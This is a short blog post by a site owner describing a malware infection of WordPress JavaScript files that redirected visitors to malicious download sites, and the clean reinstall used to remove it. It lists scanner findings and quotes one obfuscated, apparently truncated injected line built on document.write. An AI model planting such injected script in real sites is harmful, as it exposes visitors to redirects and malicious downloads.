var _0xaae8 — jQuery Malware redirecting Wordpress sites

Thomas Wooldridge
Jun 8, 2017 · 3 min read
Image for post
Image for post
Image for post
Image for post

There is a Nasty Malware that is hacking Wordpress websites. The malware redirects EVERY pages randomly to another websites that have malicious downloads to infect users systems.

This virus is attacking the jQuery.js files. Normally core Wordpress files are pretty secure if you constantly update your software. But it’s rather difficult to managing multiple different websites with Wordpress.

I typically don’t allow auto-update because it has caused my sites to go down, but at the same time I leave my site open to WP vulnerabilities.

Image for post
Image for post

I found 3 sites that had a redirect to the whole site. I checked my .htaccess and didn’t see anything strange. So installed a virus/malware scanner plugin called Word Fence and the results were astounding.

* File appears to be malicious: wp-admin/js/bookmarklet.js

* File appears to be malicious: wp-admin/js/bookmarklet.min.js

* File appears to be malicious: wp-admin/js/color-picker.js

* File appears to be malicious: wp-admin/js/color-picker.min.js

* File appears to be malicious: wp-admin/js/comment.js

* File appears to be malicious: wp-admin/js/comment.min.js

* File appears to be malicious: wp-admin/js/custom-header.js

* File appears to be malicious: wp-admin/js/customize-controls.js

* File appears to be malicious: wp-admin/js/customize-controls.min.js

* File appears to be malicious: wp-admin/js/customize-nav-menus.js

* File appears to be malicious: wp-admin/js/customize-nav-menus.min.js

* File appears to be malicious: wp-admin/js/customize-widgets.js

* File appears to be malicious: wp-admin/js/customize-widgets.min.js

* File appears to be malicious: wp-admin/js/edit-comments.js

* File appears to be malicious: wp-admin/js/edit-comments.min.js

* File appears to be malicious: wp-admin/js/editor-expand.js

* File appears to be malicious: wp-admin/js/editor-expand.min.js

* File appears to be malicious: wp-admin/js/editor.js

* File appears to be malicious: wp-admin/js/editor.min.js

* File appears to be malicious: wp-admin/js/gallery.js

* File appears to be malicious: wp-admin/js/gallery.min.js

* File appears to be malicious: wp-admin/js/image-edit.js

* File appears to be malicious: wp-admin/js/image-edit.min.js

* File appears to be malicious: wp-admin/js/inline-edit-post.js

* File appears to be malicious: wp-admin/js/inline-edit-post.min.js

* File appears to be malicious: wp-admin/js/inline-edit-tax.js

Off course this was a snippet of the infected files, it was basically all the .js extension files were exploited. This included core WP, Plugins, and themes.

Looking at the source code they all had this

//var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x73\x3C”,”\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))//

The easiest way to fix this is to just overwrite the files with a fresh clean copy of wordpress.

This actually worked for 1 day.

The infection of all the jQuery files came back. Apparently, there was a sneaky .php back door file that the attacker is using. My concern was this code injected on the Public web side or the database.

The final solution I had to be 100% sure is to delete EVERYTHING on the server and do a clean install. I know this is a pain but it’s only solution I had. Luckily I had a backup of all my content and it didn’t take to long.

So far after 48 hours the solution still seems to be working.

In the meantime I will continue to apply this to the other infected sites and created a much stronger password and CHMOD directory permissions. Hopefully this solves the problem.


Originally published at Thomas Wooldridge.

Thomas Wooldridge

Written by

Expanding my Territory in the Digital Age! #ProjectManager #SocialMedia #Marketing Follow #twool9 blog http://thomaswooldridge.com Portfolio http://relamark.com

Thomas Wooldridge

Written by

Expanding my Territory in the Digital Age! #ProjectManager #SocialMedia #Marketing Follow #twool9 blog http://thomaswooldridge.com Portfolio http://relamark.com

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store